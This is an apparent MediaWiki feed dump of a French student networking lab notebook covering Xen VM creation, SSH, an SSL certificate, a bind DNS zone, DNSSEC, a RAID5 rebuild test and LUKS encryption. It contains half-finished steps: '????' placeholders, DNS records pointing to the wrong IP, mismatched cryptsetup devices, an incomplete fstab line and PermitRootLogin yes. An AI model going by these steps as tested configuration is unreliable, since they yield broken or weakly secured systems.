       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
 &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
 -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
 Listen 80&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;banane.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.banane.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
On créée ensuite le fichier db.banane.space:&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.banane.space. root.banane.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns.banane.space. &lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.162&lt;br /&gt;
 www     IN      A       193.48.57.162&lt;br /&gt;
 @       IN      A       193.48.57.162&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
 search banane.space&lt;br /&gt;
 nameserver 193.48.57.162????&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''DNS SEC''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques: &lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE banane.space&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE banane.space&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs: &lt;br /&gt;
&lt;br /&gt;
 /etc/bind/banane.space.dnssec# ls&lt;br /&gt;
 ????&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les zones:&lt;br /&gt;
&lt;br /&gt;
dnssec-signzone -o banane.space -k banane.space-ksk &lt;br /&gt;
../db.banane.space banane.space-zsk&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On reconfigure le fichier IMA5-BANANE.cfg en créant 3 nouvelles partitions LVM banane-X de 1 Go associées à notre VM.&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    4) mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues. On sauvegarde ensuite la configuration actelle.&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
 root@IMA5-BANANE:~# mkfs /dev/md0&lt;br /&gt;
 root@IMA5-BANANE:~# mkdir /datamd0&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être sûr que la partition soit encore montée après le reboot:&lt;br /&gt;
 /dev/md0 /datamd0&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# vim raid5test.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
    5) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    6) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous arrêtons la MV, mettons en commentaire la 1ère partition dans le fichier de configuration, puis redémarrons la machine.&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# ls /datamd0/&lt;br /&gt;
 raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours: Suppression de la partition xvdd:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --set-faulty /dev/md0 /dev/xvdd&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --remove /dev/md0 /dev/xvdd&lt;br /&gt;
 La partition est bien supprimée:&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&lt;br /&gt;
On remet à présent la partition supprimée:&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
On essaie ensuite de remonter le RAID5 et on peut constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&lt;br /&gt;
    7) root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
 cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
 mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
 vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose crypt_sd&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46213</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46213"/>
				<updated>2017-11-13T12:43:48Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Serveur DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
